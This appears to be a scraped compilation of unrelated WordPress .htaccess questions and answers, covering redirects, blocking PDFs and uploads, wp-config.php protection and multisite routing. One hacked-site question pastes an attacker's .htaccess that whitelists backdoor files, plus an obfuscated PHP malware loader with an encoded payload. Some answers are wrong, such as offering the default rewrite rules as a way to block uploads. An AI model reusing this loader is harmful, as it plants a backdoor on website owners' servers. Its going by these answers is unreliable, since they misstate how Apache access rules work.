I'm currently using the WP htaccess Control plugin for my WordPress website and I would like to make a modification to its code. Presently, each page is accessible via multiple url structures. For example, site.com/page/ is accessible as is site.com/page
I would like to setup the htaccess whereas the non trailing slash redirects to the trailing slash, for every page of the site.
I believe I have the code, but I've seen a couple different variations. I want to make sure I implement the right one, plus I'm not exactly sure how it should be done with this particular plugin.
Do I just add the additional lines to the "custom" section? To my understanding it has to be placed with the rewrite rules, but the custom code I can input only goes to the top.
Currently, the following line is in "custom htaccess":
php_value memory_limit 96M
the entire file is:
# BEGIN WordPress
# WPhtc: Begin Custom htaccess
php_value memory_limit 96M
# WPhtc: End Custom htaccess
# WPhtC: Disable ServerSignature on generated error pages
ServerSignature Off
# WPhtC: Protect WP-config.php
<files wp-config.php>
order allow,deny
deny from all
</files>
# WPhtC: Protect .htaccess file
<files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
</files>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
thank you
Related
I've read a baker's dozen of similar questions and the common issues found therein have not helped me resolve this. I could really use some help figuring this out. What should I try next? Is there a way to troubleshoot why these rules are not being respected?
This is a Wordpress environment on an Inmotion Hosting vps with WHM/cPanel and Apache 2.4. Nginx is not being used to cache this account.
I need to deny access to PDFs in a sub-directory, specifically:
/public_html/wp-content/uploads/gravity_forms/fillablepdfs/
My web root .htaccess is as follows.
/public_html/.htaccess
AllowOverride All
# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
# Wordfence WAF
<Files ".user.ini">
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>
# END Wordfence WAF
# php -- BEGIN cPanel-generated handler, do not edit
# Set the “ea-php74” package as the default “PHP” programming language.
<IfModule mime_module>
AddHandler application/x-httpd-ea-php74 .php .php7 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit
I have tried many combinations in the web-root .htaccess and in the sub-directories in the path to the directory in question.
These did not work:
/public_html/wp-content/uploads/gravity_forms/fillablepdfs/.htaccess
Order deny,allow
Deny from all
Require all denied
<Files "*.pdf">
Order deny,allow
Deny from all
</Files>
<Files "*.pdf">
Require all denied
</Files>
After those failed to work I moved up the directories attempting the same until I reached the web-root .htaccess again, where I tried the following.
/public_html/.htaccess
AllowOverride All
. . .
# BEGIN fillable-pdfs
# Restrict access to generated pdfs directory.
<Files "*.pdf">
Require all denied
</Files>
# END fillable-pdfs
AllowOverride All
. . .
# BEGIN fillable-pdfs
# Restrict access to generated pdfs directory.
<Files "*.pdf">
Order deny,allow
Deny from all
</Files>
# END fillable-pdfs
AllowOverride All
. . .
# BEGIN fillable-pdfs
# Restrict access to generated pdfs directory.
<Files "*.pdf">
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>
# END fillable-pdfs
AllowOverride All
. . .
# BEGIN fillable-pdfs
# Restrict access to generated pdfs directory.
<Files "wp-content/uploads/gravity_forms/fillablepdfs/*.pdf">
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>
# END fillable-pdfs
AllowOverride All
. . .
# BEGIN fillable-pdfs
# Restrict access to generated pdfs directory.
<Files "./wp-content/uploads/gravity_forms/fillablepdfs/*.pdf">
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>
# END fillable-pdfs
None of these worked.
There are two other .htaccess files along the path. They are:
/public_html/wp-content/uploads/.htaccess
# BEGIN WebP Express
# The rules below have been dynamically created by WebP Express in accordance with the plugin settings
# DO NOT EDIT MANUALLY (unless you are prepared that your changes might be overridden by WebP Express)
# The following parameters have been in play to produce the rules:
#
# WebP Express options:
# - Operation mode: varied-image-responses
# - Redirection to existing webp: enabled
# - Redirection to converter: enabled
# - Redirection to converter to create missing webp files upon request for the webp: enabled
# - Destination folder: separate
# - Destination extension: append
# - Destination structure: image-roots
# - Image types: jpeg, png
# - Alter HTML enabled?: yes
#
# Wordpress/Server configuration:
# - Document root availablity: Available and its "realpath" is available too. Can be used for structuring cache dir.
#
# .htaccess capability test results:
# - mod_header working?: yes
# - pass variable from .htaccess to script through header working?: no
# - pass variable from .htaccess to script through environment variable working?: yes
#
# Role of the dir that this .htaccess is located in:
# - Is this .htaccess in a dir containing source images?: yes
# - Is this .htaccess in a dir containing webp images?: no
# Rules for handling requests for source images
# ---------------------------------------------
<IfModule mod_rewrite.c>
RewriteEngine On
# Escape hatch #1: Adding ?dontreplace to an url can be used to bypass redirection
RewriteCond %{QUERY_STRING} dontreplace$
RewriteCond %{REQUEST_FILENAME} -f
RewriteRule . - [L]
# Escape hatch #2: Placing an empty file in the same folder as the jpeg/png which has same file name, but ".dontreplace" appended will bypass redirection
RewriteCond %{REQUEST_FILENAME} (?i)(.*)(\.jpe?g|\.png)$
RewriteCond %1%2\.dontreplace -f
RewriteRule . - [L]
# Deprecated escape hatch: Adding ?original to an url can be used to bypass redirection
RewriteCond %{QUERY_STRING} original$
RewriteCond %{REQUEST_FILENAME} -f
RewriteRule . - [L]
# Deprecated escape hatch: Placing an empty file in the same folder as the jpeg/png which has same file name, but ".do-not-convert" appended will bypass redirection
RewriteCond %{REQUEST_FILENAME} (?i)(.*)(\.jpe?g|\.png)$
RewriteCond %1%2\.do-not-convert -f
RewriteRule . - [L]
# Avoid redirecting to webp files that are bigger than the original
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} (?i)(/home/***/public_html/wp-content/uploads/)(.*)(\.jpe?g|\.png)$
RewriteCond /home/***/public_html/wp-content/webp-express/webp-images-bigger-than-source/uploads/%2%3.webp -f
RewriteRule . - [L]
# Redirect to existing converted image in cache-dir (if browser supports webp)
RewriteCond %{HTTP_ACCEPT} image/webp
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} (?i)(/home/***/public_html/wp-content/uploads/)(.*)(\.jpe?g|\.png)$
RewriteCond /home/***/public_html/wp-content/webp-express/webp-images/uploads/%2%3.webp -f
RewriteRule (?i)(.*)(\.jpe?g|\.png)$ /wp-content/webp-express/webp-images/uploads/%2%3\.webp [T=image/webp,E=EXISTING:1,E=ADDVARY:1,L]
# Redirect images to webp-on-demand.php (if browser supports webp)
RewriteCond %{HTTP_ACCEPT} image/webp
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} (?i)(.*)(\.jpe?g|\.png)$
RewriteRule (?i).*$ /wp-content/plugins/webp-express/wod/webp-on-demand.php [E=WE_WP_CONTENT_REL_TO_WE_PLUGIN_DIR:../../,E=WE_SOURCE_REL_HTACCESS:$0,E=WE_HTACCESS_ID:uploads,NC,L]
# Make sure that browsers which does not support webp also gets the Vary:Accept header
# when requesting images that would be redirected to webp on browsers that does.
<IfModule mod_headers.c>
<FilesMatch "(?i)\.(jpe?g|png)$">
Header append "Vary" "Accept"
</FilesMatch>
</IfModule>
</IfModule>
# END WebP Express
/public_html/wp-content/uploads/gravity_forms/.htaccess
# BEGIN Gravity Forms
# The directives (lines) between "BEGIN Gravity Forms" and "END Gravity Forms" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
# Disable parsing of PHP for some server configurations. This file may be removed or modified on certain server configurations by using by the gform_upload_root_htaccess_rules filter. Please consult your system administrator before removing this file.
<Files *>
SetHandler none
SetHandler default-handler
Options -ExecCGI
RemoveHandler .cgi .php .php3 .php4 .php5 .phtml .pl .py .pyc .pyo
</Files>
<IfModule mod_php5.c>
php_flag engine off
</IfModule>
<IfModule headers_module>
Header set X-Robots-Tag "noindex"
</IfModule>
# END Gravity Forms
Nginx was configured to bypass Apache to "Accelerate static content".
Disabling this allows .htaccess files to function on .txt, .pdf, etc...
please tell me what can I do to protect my .htaccess file ? Recently I was hacked and I noticed that I can navigate into different place of my wp-admin (Posts, settings, plugins,...) they show permission page - forbiden. A .htaccess is generate and also an index.php and themes.php is added to root. I've deleted the .htaccess file, index.php and themes.php and I've created a new .htaccees which content many lines of protection rules, but it's always replaced by a new. How can I track the hacked script please ?
Code of hacked .htaccess:
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|wp-login.php|load.php|themes.php|admin.php|settings.php|bottom.php|years.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
Code of index.php:
<?php $zdHKDPrQNF='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$zdHKDPrQNF[(105/15)].$zdHKDPrQNF[(26-1)].$zdHKDPrQNF[(1*49)].$zdHKDPrQNF[((10*1)+18)].$zdHKDPrQNF[(14+22)].$zdHKDPrQNF[(44+5)].$zdHKDPrQNF[(44-13)].$zdHKDPrQNF[(684/18)].$zdHKDPrQNF[(23+4)].$zdHKDPrQNF[(72-(33-7))].$zdHKDPrQNF[(154/22)].$zdHKDPrQNF[(11+25)].$zdHKDPrQNF[(65-(62-31))].$zdHKDPrQNF[(26-6)].$zdHKDPrQNF[((27*2)-8)];$pHFdNhg9688=$zdHKDPrQNF[(20-9)].$zdHKDPrQNF[(2*4)].$zdHKDPrQNF[(29*1)].$zdHKDPrQNF[(160/4)];$MYtraky2482=$zdHKDPrQNF[(8*5)].$zdHKDPrQNF[((1+0)+2)].$zdHKDPrQNF[(6+(1*(95/19)))].$zdHKDPrQNF[(140/5)].$zdHKDPrQNF[(522/18)].$zdHKDPrQNF[(7*((7-3)-2))].$zdHKDPrQNF[(2*14)].$zdHKDPrQNF[(138/(2+4))].$zdHKDPrQNF[(1029/(378/18))].$zdHKDPrQNF[((2*189)/9)].$zdHKDPrQNF[(12+(0+0))].$zdHKDPrQNF[(31*1)].$zdHKDPrQNF[(48/(36/12))].$zdHKDPrQNF[(735/15)].$zdHKDPrQNF[(0+7)].$zdHKDPrQNF[(18+2)].$zdHKDPrQNF[(18-(10/5))].$zdHKDPrQNF[(735/15)].$zdHKDPrQNF[(0+(2-(1*1)))].$zdHKDPrQNF[(16-(3+(36/(0+18))))].$zdHKDPrQNF[((167-23)/18)].$zdHKDPrQNF[(0+(18-9))].$zdHKDPrQNF[(1*3)].$zdHKDPrQNF[(11*(1+(0/(78/13))))].$zdHKDPrQNF[(2*7)].$zdHKDPrQNF[(29*(0+1))].$zdHKDPrQNF[(38-(8+9))].$zdHKDPrQNF[(15*2)].$zdHKDPrQNF[(45-11)].$zdHKDPrQNF[(1*46)].$zdHKDPrQNF[(1*(17+21))].$zdHKDPrQNF[(78/3)].$zdHKDPrQNF[(21+(77/11))].$zdHKDPrQNF[(22+14)].$zdHKDPrQNF[(343/(91/13))].$zdHKDPrQNF[(1*1)].$zdHKDPrQNF[(21-10)].$zdHKDPrQNF[(22+(12/2))].$zdHKDPrQNF[(180/20)].$zdHKDPrQNF[(3+((0+0)*1))].$zdHKDPrQNF[(686/(126/9))].$zdHKDPrQNF[(61-(32-8))].$zdHKDPrQNF[(476/17)].$zdHKDPrQNF[((4-0)+22)].$zdHKDPrQNF[(((23-(2*5))/13)-0)].$zdHKDPrQNF[(7+(84/21))].$zdHKDPrQNF[(28/2)].$zdHKDPrQNF[(9-0)].$zdHKDPrQNF[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;#$mEriqO3481=$q2866((''), ($JTx2343));#$mEriqO3481(); ?>
This is an AnonymousFox hack. It is very sophisticated. See these steps to clean your hacked hosting account > https://forum.ait-pro.com/forums/topic/wp-dester-and-wpyii2-hacker-plugins/
Create lock666.php as a folder
Check if there is a suspicious cron job, delete it if any.
remove all newly created .htaccess file
remove all license.txt files
remove all suspicious new .php file
random file name
if after creating the "lock666.php" folder you can't edit the .htaccess and index.php files, rename them to the ones in the hacked .htaccess file
I am hoping you can help, I have been having real trouble getting a .htaccess file for work correctly.
I am trying to block of all access to files and folders within the wp-content/uploads/ folder
i have resorted to placing a .htaccess file in each subdirectory with:
deny from all
This works OK if i FTP a file up and try to access it, the trouble is if i use wordpress to upload a file (in to the same folder) this file is accessible
any ideas on whats going on and a solution?
thanks in advance for any help
Try to write some rule in .htaccess file something like.
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
This will allow you to block off all access to files and folders within the wp-content/uploads/ folder.
I had a similar issue. Once I updated wildcard to include .html (root htaccess), my deny all in the subdirectory worked just fine.
From this:
<Files *>
order deny,allow
deny from env=notallowed
allow from env=allowsome
</Files>
To this:
order deny,allow
deny from env=notallowed
allow from env=allowsome
I have few questions regarding the wp-config.php file in Wordpress. I moved the file from the wordpress installation directory, above the www directory and inside one of the home folders. I followed this tutorial. In the main wordpress directory i added another wp-config.php file with the following include path:
<?php
include('/home/www/web55438/files/wp-config.php');
?>
Inside the files folder i also added the following .htaccess file.
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
#Prevend directory browsing
Options All -Indexes
#Protect files from displaying
<Files wp-config.php>
order allow,deny
deny from all
</Files>
#Protect htaccess file
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
My questions are: Is this a secure way for handling the wp-config.php file with an absolute path? Is the .htaccess file configured properly? And what would you change for better wordpress security?
Thanks
<Files wp-config.php>
order allow,deny
deny from all
</Files>
change it to
<Files wp-config.php>
order deny,allow
deny from all
</Files>
This way, you are denying access to wp-config.php
As you are moving your config file from default location to location above your root of website. Then this is proper way to include that file
Regarding adding more security, follow stuff posted by Vhortex in one of the questions.
I have a Wordpress multisite installed, and would like to understand how the subdomains actually are managed, ie how does my wordpress multisite knows where to find the files/data when a browser request URL user1.domain.com ?
I checked the DNS A record and see only the wild card.
I checked the .htaccess, and it looks as follows:
RewriteEngine On
RewriteBase /
# Protect the htaccess file
<Files .htaccess>
Order Allow,Deny
Deny from all
</Files>
# Protect wpconfig.php
<Files wp-config.php>
Order Allow,Deny
Deny from all
</Files>
# Disable directory browsing
Options All -Indexes
RewriteRule ^index\.php$ - [L]
# uploaded files
RewriteRule ^files/(.+) wp-includes/ms-files.php?file=$1 [L]
RewriteCond %{REQUEST_FILENAME} -f [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^ - [L]
RewriteRule . index.php [L]
so I think the .htaccess does not manage the subdomain, or does it?
so then, how does my wordpress multisite knows where to find the files/data when a browser request URL user1.domain.com ?